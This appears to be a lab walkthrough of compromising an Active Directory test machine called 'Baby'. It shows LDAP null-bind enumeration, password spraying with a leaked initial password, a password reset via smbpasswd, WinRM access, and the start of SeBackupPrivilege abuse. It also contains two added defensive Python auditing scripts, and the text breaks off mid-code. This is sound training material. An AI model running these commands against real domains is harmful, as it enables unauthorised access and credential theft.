Overview
The machine starts with LDAP null-bind enumeration, which reveals a password in a user's description field. Spraying that password across all domain users finds Caroline.Robinson with a must-change-password status, so we reset her password via smbpasswd to get WinRM access. Then SeBackupPrivilege is abused with diskshadow to create a VSS snapshot, robocopy extracts ntds.dit from it, secretsdump dumps the domain hashes, and we pass-the-hash as Administrator.
Enumeration
We'll start with nmap as usual:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.234.71 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-03 11:23 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:23
Completed NSE at 11:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:23
Completed NSE at 11:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:23
Completed NSE at 11:23, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:23
Completed Parallel DNS resolution of 1 host. at 11:23, 0.10s elapsed
Initiating Connect Scan at 11:23
Scanning 10.129.234.71 [1000 ports]
Discovered open port 135/tcp on 10.129.234.71
Discovered open port 139/tcp on 10.129.234.71
Discovered open port 3389/tcp on 10.129.234.71
Discovered open port 445/tcp on 10.129.234.71
Discovered open port 53/tcp on 10.129.234.71
Discovered open port 3268/tcp on 10.129.234.71
Discovered open port 636/tcp on 10.129.234.71
Discovered open port 88/tcp on 10.129.234.71
Discovered open port 389/tcp on 10.129.234.71
Discovered open port 3269/tcp on 10.129.234.71
Discovered open port 464/tcp on 10.129.234.71
Discovered open port 593/tcp on 10.129.234.71
Completed Connect Scan at 11:24, 14.66s elapsed (1000 total ports)
Initiating Service scan at 11:24
Scanning 12 services on 10.129.234.71
Completed Service scan at 11:24, 15.78s elapsed (12 services on 1 host)
NSE: Script scanning 10.129.234.71.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:24
NSE Timing: About 99.94% done; ETC: 11:24 (0:00:00 remaining)
Completed NSE at 11:25, 40.14s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 5.45s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Nmap scan report for 10.129.234.71
Host is up, received user-set (0.14s latency).
Scanned at 2026-06-03 11:23:55 PDT for 76s
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-06-03 18:24:18Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| DNS_Tree_Name: baby.vl
| Product_Version: 10.0.20348
| _ System_Time: 2026-06-03T18:24:28+00:00
| _ssl-date: 2026-06-03T18:25:07+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-02T18:17:46
| Not valid after: 2026-12-02T18:17:46
| MD5: 3d47:9d95:f5b7:44a5:20a3:b855:8475:db5a
| SHA-1: f6dd:ef9b:7e40:2924:4e52:4b8e:0143:0e01:2085:0a87
| -----BEGIN CERTIFICATE-----
| MIIC4DCCAcigAwIBAgIQF6Zt4P07UbpPqG8besu3ZTANBgkqhkiG9w0BAQsFADAZ
| MRcwFQYDVQQDEw5CYWJ5REMuYmFieS52bDAeFw0yNjA2MDIxODE3NDZaFw0yNjEy
| MDIxODE3NDZaMBkxFzAVBgNVBAMTDkJhYnlEQy5iYWJ5LnZsMIIBIjANBgkqhkiG
| 9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgyeWZ6ED8fpzFC1ThrD+jEjPb5vhcW6wjV1
| 25gRHqTWGJXgdtuf56K42sZdOLHERPj2ezXCKkKswGigLBrtB9uGB+rbnb0KYtmZ
| Y3j8HW5MwH8fiTh9W25f4pMZ/TmKko8MuRsHDEemJTiuq2S5rR4rUZGfMvwXLQUD
| tfDB9/+C58ecxydZVIEwQULaWJnTWf9h6tHW2V8N7RHGeZRI9UDsWn2pr7N6ea3E
| 07j8LiJl9o+hNcgKU2HWLVsxkSgYTyWMgEaU/ljN7S8rPfksfvHVz9AbfC7zio+u
| icesvGiBakP6sd8xtoNF+42ephGWhlNV2046XxpJAvpWy6R3XQIDAQABoyQwIjAT
| BgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQAD
| ggEBAIDTR5lWn60HTD85Q7SnNv5d33+sZI2zChgUWur1XVbaJm+7qhq56uBgWPCN
| 06uSe7UCszGayfhssm12Q98B5E2plRZV2DSZnOaVxv7NvQgcmxV55BorU5KfTjK8
| znXVoBhwDOyLE7IjqQh/IWvzL5vhrxoVP9DE3JEVBpywlz4tPK7FGSSPmlMjXcl8
| zNKwDPHYzufWqQ0yrWb31RAWpKlJ0ENzeB0ybWlDx52hI4EMbTdHmVpVLuX2JwAn
| YOoQXHTx0xhbPo0Xkg4kO9ZH6QEIZ0fRDwYeA1co9XJLHOQQWHPo4UyC+owEC8B1
| ojYaqoVOj/3LvAUnKA4ghipRxk0=
| _-----END CERTIFICATE-----
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| _clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
| smb2-time:
| date: 2026-06-03T18:24:29
| _ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 6299/tcp): CLEAN (Timeout)
| Check 2 (port 53666/tcp): CLEAN (Timeout)
| Check 3 (port 13485/udp): CLEAN (Timeout)
| Check 4 (port 42075/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.60 seconds
We got SMB, DNS, Kerberos and LDAP, so it is obviously an Active Directory environment; it isn't an assumed-breach scenario and there is no website to go through. What we got here is:
- the domain name is baby.vl and the hostname is BabyDC, so the FQDN is BabyDC.baby.vl; add those to the hosts file
- the clock skew is fine, in case we have to deal with Kerberos authentication
So let's set up the environment by generating a krb5 file, moving it to /etc, and adding the entries to the hosts file:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ echo '10.129.234.71 BabyDC BabyDC.baby.vl baby.vl' | sudo tee -a /etc/hosts
10.129.234.71 BabyDC BabyDC.baby.vl baby.vl
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ nxc smb baby.vl -u '' -p '' --generate-krb5-file krb5.conf
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [+] krb5 conf saved to: krb5.conf
SMB 10.129.234.71 445 BABYDC [+] Run the following command to use the conf file: export KRB5_CONFIG=krb5.conf
SMB 10.129.234.71 445 BABYDC [+] baby.vl\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ sudo mv krb5.conf /etc/krb5.conf
As you can see, Null Auth is True on SMB, so we can try the Guest account to see whether it can access any shares, or do some enumeration like brute-forcing RIDs for usernames.
But the Guest account is disabled:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ nxc smb 10.129.234.71 -u 'Guest' -p '' --shares
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Guest: STATUS_ACCOUNT_DISABLED
At this point, with no file-sharing service like FTP or SMB available to us, there are 3 options to try here:
- timeroast attacks
- pre2k accounts with a wordlist
- LDAP user fields
I started with the pre2k accounts using the pre2k tool, but nothing was found out of 2400 possible hostnames:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/pre2k]
└──╼ [★]$ pre2k unauth -d baby.vl -dc-ip 10.129.234.71 -inputfile ../hostnames.txt
___ __
/'___`\ /\ \
_____ _ __ __ /\_\ /\ \\ \ \/'\
/\ '__`\/\`' __\/'__`\ _______\/_/// /__\ \ , <
\ \ \L\ \ \ \//\ __//\______\ // /_\ \\ \ \\`\
\ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
\ \ \/ \/_/ \/____/ \/_____/ \/_/\/_/
\ \_\ v3.1
\/_/
@unsigned_sh0rt
@Tw1sm
[11:38:09] INFO Testing started at 2026-06-03 11:38:09
[11:38:09] INFO Using 10 threads
I also tried timeroast, but it returned a single account with RID 1000, which is the DC itself, and there is no way it'll be vulnerable to timeroast (usually you'd try to crack it anyway, but from experience I know it wouldn't work):
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ python3 /opt/scripts/timeroast/timeroast.py 10.129.234.71
1000:$sntp-ms$a5f7e23f8a660676d93ff11839f6286a$1c0111e900000000000a03bf4c4f434cedcaee67b2bcc872e1b8428bffbfcd0aedcaf35906b466a4edcaf35906b4a665
The last thing is the LDAP user fields. Usually you would do this manually with tools like ldapsearch and windapsearch, but I've got a tool with a good search heuristic over the fields to identify what is a possible password and what isn't, so let's use it; at the end we can also show the manual way.
Null Bind LDAP
For this to work, LDAP null bind must be enabled, and as you can see here it is, so let's run my tool directly:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/pre2k]
└──╼ [★]$ nxc ldap 10.129.234.71 -u '' -p ''
LDAP 10.129.234.71 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.71 389 BABYDC [+] baby.vl\:
As you can see the domain is very small: just 2 users have a description, and one of them contains a password, so let's try it:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ python3 deschunt.py -H 10.129.234.71
[*] Connecting to 10.129.234.71:389 ...
[*] Fetching user descriptions from: DC=baby,DC=vl
════════════════════════════════════════════════════════════
LDAP Description Hunt — Results
════════════════════════════════════════════════════════════
[!] INTERESTING (unique + suspicious) [1]
► Teresa.Bell (Teresa Bell)
Set initial password to BabyStart123!
────────────────────────────────────────────────────────────
Users scanned : 2
Interesting : 1
Unique/clean : 1
Repeated : 0
────────────────────────────────────────────────────────────
But when I tried to log in it didn't work. Here is something interesting, though: the description says "set initial password to X", so whoever is instructing Teresa might have used this password for other accounts too. Let's get a list of the domain users and password-spray with the password we found:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ nxc ldap 10.129.234.71 -u Teresa.Bell -p 'BabyStart123!'
LDAP 10.129.234.71 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.71 389 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123!
So we got a list of users; let's test against them:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ python3 ldaphunt.py -H 10.129.234.71 --users
[*] Connecting to 10.129.234.71:389 ...
[*] Base DN : DC=baby,DC=vl
[*] Phase 1 — pulling confirmed user objects ...
[*] Detected naming convention: first.last (e.g. Jacqueline.Barnett)
[*] Phase 2 — sweeping entire directory for 'first.last' pattern ...
══════════════════════════════════════════════════════════════════════
User Discovery Results
══════════════════════════════════════════════════════════════════════
── Confirmed User Objects [9] ──
Guest
Desc : Built-in account for guest access to the computer/domain
Jacqueline.Barnett
Display : Jacqueline Barnett
Ashley.Webb
Display : Ashley Webb
Hugh.George
Display : Hugh George
Leonard.Dyer
Display : Leonard Dyer
Connor.Wilkinson
Display : Connor Wilkinson
Joseph.Hughes
Display : Joseph Hughes
Kerry.Wilson
Display : Kerry Wilson
Teresa.Bell
Display : Teresa Bell
Desc : Set initial password to BabyStart123!
── Convention Sweep: no extra objects found ──
[+] 8 usernames saved → users.txt
──────────────────────────────────────────────────────────────────────
Confirmed users : 9
Extra (sweep) : 0
Total written : 8 → users.txt
──────────────────────────────────────────────────────────────────────
As you can see it didn't work either, so at this point I suspected something was wrong and my tool might have missed something, so I went manual with ldapsearch to see what happens:
└──╼ [★]$ nxc smb 10.129.234.71 -u users.txt -p 'BabyStart123!'
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
Shell as Caroline.Robinson
And here I found something interesting: there are additional usernames that didn't appear in our results, like Ian.Walker for example, so we'll just add those to our list first and then check why they didn't appear:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ ldapsearch -H ldap://10.129.234.71 -x -b "dc=baby,dc=vl" "dn" | grep -v '#'
dn: DC=baby,DC=vl
dn: CN=Administrator,CN=Users,DC=baby,DC=vl
dn: CN=Guest,CN=Users,DC=baby,DC=vl
dn: CN=krbtgt,CN=Users,DC=baby,DC=vl
dn: CN=Domain Computers,CN=Users,DC=baby,DC=vl
dn: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Schema Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
dn: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
dn: CN=Domain Admins,CN=Users,DC=baby,DC=vl
dn: CN=Domain Users,CN=Users,DC=baby,DC=vl
dn: CN=Domain Guests,CN=Users,DC=baby,DC=vl
dn: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
dn: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
dn: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Protected Users,CN=Users,DC=baby,DC=vl
dn: CN=Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
dn: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
dn: CN=dev,CN=Users,DC=baby,DC=vl
dn: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
dn: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
dn: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
dn: CN=Ian Walker,OU=dev,DC=baby,DC=vl
dn: CN=it,CN=Users,DC=baby,DC=vl
dn: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
dn: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
dn: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
ref: ldap://ForestDnsZones.baby.vl/DC=ForestDnsZones,DC=baby,DC=vl
ref: ldap://DomainDnsZones.baby.vl/DC=DomainDnsZones,DC=baby,DC=vl
ref: ldap://baby.vl/CN=Configuration,DC=baby,DC=vl
Here is the reason, I guess: the users returned the first time have CN=Users in their path, but these users weren't part of the Users container, and I think that is why nxc and my tool missed them.
There is a better way to get this list of course, but this will do the trick:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ ldapsearch -H ldap://10.129.234.71 -x -b "dc=baby,dc=vl" "dn" | grep -v '#' | grep dn | grep -v Users | cut -d "," -f 1 | cut -d ":" -f 2 | cut -d '=' -f 2 | sed 's/ /./g'
baby
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
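The pipeline above still depends on the shape of the DN (it even emits "baby" from the root object) and on excluding CN=Users by name. The better query is a subtree search from the base DN for (&(objectClass=user)(objectCategory=person)) returning sAMAccountName and description, which picks up accounts in every OU. The following is an added example, my own code rather than the walkthrough's deschunt or ldaphunt tools, that parses the LDIF ldapsearch prints (comments, folded continuation lines, base64 "::" values, "ref:" referrals), lists the user objects regardless of container, and flags descriptions that look like they carry a credential, i.e. the same check as the description hunt earlier on this page, which is also the audit an AD administrator should run against their own directory. The LDIF sample is constructed with made-up names and passwords, and the keyword and token heuristics are an assumption of this example, not a standard.

```python
import base64
import re

# Constructed sample in the shape ldapsearch prints a directory dump. Names and passwords
# are made up. It covers what tripped the walkthrough up: accounts living in OUs rather
# than CN=Users, a description folded over two lines, and a base64 ("::") description.
SAMPLE_LDIF = """\
# extended LDIF
#
dn: DC=example,DC=test
objectClass: domainDNS

dn: CN=Guest,CN=Users,DC=example,DC=test
objectClass: top
objectClass: person
objectClass: user
sAMAccountName: Guest
description: Built-in account for guest access to the computer/domain

dn: CN=Domain Admins,CN=Users,DC=example,DC=test
objectClass: group
sAMAccountName: Domain Admins

dn: CN=Alice Smith,OU=dev,DC=example,DC=test
objectClass: user
sAMAccountName: Alice.Smith
description: Set initial password to Wel
 come123!

dn: CN=Bob Jones,OU=it,DC=example,DC=test
objectClass: user
sAMAccountName: Bob.Jones
description:: U3VtbWVyMjAyNCE=

dn: CN=Carol White,OU=it,DC=example,DC=test
objectClass: user
sAMAccountName: Carol.White
description: Contractor, expires next quarter

ref: ldap://ForestDnsZones.example.test/DC=ForestDnsZones,DC=example,DC=test
"""

ATTR_RE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")


def parse_ldif(text):
    """Parse LDIF into a list of records: {'dn': str, '<attr lowercased>': [values]}.

    Handles '#' comments, folded continuation lines (leading space), base64 '::' values,
    and skips 'ref:' referral records, which are not directory objects."""
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]          # continuation of the previous line
        else:
            unfolded.append(raw)

    entries, current = [], None
    for line in unfolded:
        if line.startswith("#"):
            continue
        if not line.strip():                 # a blank line ends the record
            if current is not None:
                entries.append(current)
                current = None
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue
        name, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        if name == "dn":
            if current is not None:
                entries.append(current)
            current = {"dn": value}
        elif name != "ref" and current is not None:
            current.setdefault(name.lower(), []).append(value)
    if current is not None:
        entries.append(current)
    return entries


def user_accounts(entries):
    """User objects from any container or OU (not groups, not computer accounts)."""
    users = []
    for e in entries:
        classes = {c.lower() for c in e.get("objectclass", [])}
        if "user" in classes and "computer" not in classes:
            users.append(e)
    return users


# Heuristics (an assumption of this example): a credential-ish keyword, or a token of
# 8+ non-space characters mixing upper, lower, digit and punctuation.
KEYWORD_RE = re.compile(r"password|passwd|pwd|initial|cred|login", re.I)
TOKEN_RE = re.compile(r"(?=\S*[A-Z])(?=\S*[a-z])(?=\S*\d)(?=\S*[^\w\s])\S{8,}")


def suspicious_descriptions(users):
    """[(sAMAccountName, description)] for descriptions that look like they hold a credential."""
    hits = []
    for u in users:
        name = u.get("samaccountname", [u["dn"]])[0]
        for desc in u.get("description", []):
            if KEYWORD_RE.search(desc) or TOKEN_RE.search(desc):
                hits.append((name, desc))
    return hits


if __name__ == "__main__":
    found = user_accounts(parse_ldif(SAMPLE_LDIF))
    print("user objects:", [u["samaccountname"][0] for u in found])
    for name, desc in suspicious_descriptions(found):
        print(f"[!] {name}: {desc}")
```

Feed it the output of a real ldapsearch run over stdin or a file instead of SAMPLE_LDIF and the same two functions apply; the keyword list will produce the odd false positive ("accredited" matches "cred"), which is the right trade-off for an audit that a human reviews.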
As you can see it worked: the user Caroline.Robinson must change her password before logging in, so let's change it:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ nxc smb 10.129.234.71 -u users.txt -p 'BabyStart123!'
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\baby:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
There are multiple ways to change the password: kpasswd, but then we have to deal with the realm and the KDC; ldappasswd, but we have to specify the entire object DN; the easiest way is smbpasswd, as you can see:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ smbpasswd -U caroline.robinson -r baby.vl
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user caroline.robinson
And we got WinRM working, so let's log in:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ nxc smb 10.129.234.71 -u caroline.robinson -p 'Password123!'
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [+] baby.vl\caroline.robinson:Password123!
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ nxc winrm 10.129.234.71 -u caroline.robinson -p 'Password123!'
WINRM 10.129.234.71 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.234.71 5985 BABYDC [+] baby.vl\caroline.robinson:Password123! (Pwn3d!)
And we have user.

Shell as Administrator
Looking for special privileges, we have SeBackupPrivilege, which lets us back up the registry hives, so we can dump the SAM, SECURITY and SYSTEM hives and extract the hashes locally using secretsdump:
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
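Reading that table by eye is fine for six rows; as an added example (my own code, not from the post) here is a parser for a whoami /priv listing that tolerates the collapsed whitespace seen above, returns the privileges present, and flags the high-impact ones. It reports Disabled entries as well, because a privilege that is in the token but disabled can be switched on by its holder, so "Disabled" is not a safe state. The first sample is the table from the post; the second, with a Disabled row, is constructed, and the impact notes are my own one-line summaries.

```python
import re

# One table row: privilege name, free-text description, state. Written to tolerate both
# the aligned columns whoami prints and the collapsed whitespace of pasted output.
ROW_RE = re.compile(r"^\s*(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")

# Privileges whose holder can step outside normal ACL or process boundaries.
# The notes are this example's own summaries of what each right grants.
HIGH_IMPACT = {
    "SeBackupPrivilege": "read any file regardless of its ACL (registry hives, files in a shadow copy)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate a client's security token",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a process",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeManageVolumePrivilege": "raw access to volumes",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
}


def parse_privs(text):
    """Return {privilege: {'description': str, 'enabled': bool}} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            privs[m.group(1)] = {"description": m.group(2), "enabled": m.group(3) == "Enabled"}
    return privs


def triage(privs):
    """[(privilege, state, note)] for every high-impact privilege present in the token.

    'Disabled' rows are reported too: the privilege is in the token but not currently
    switched on, and the holder can enable it with AdjustTokenPrivileges."""
    return [
        (name, "Enabled" if info["enabled"] else "Disabled", HIGH_IMPACT[name])
        for name, info in privs.items()
        if name in HIGH_IMPACT
    ]


# The listing from the walkthrough, with whitespace collapsed as it appears above.
CAROLINE_PRIVS = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Constructed listing for an ordinary user with one privilege present but disabled.
PLAIN_USER_PRIVS = """\
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
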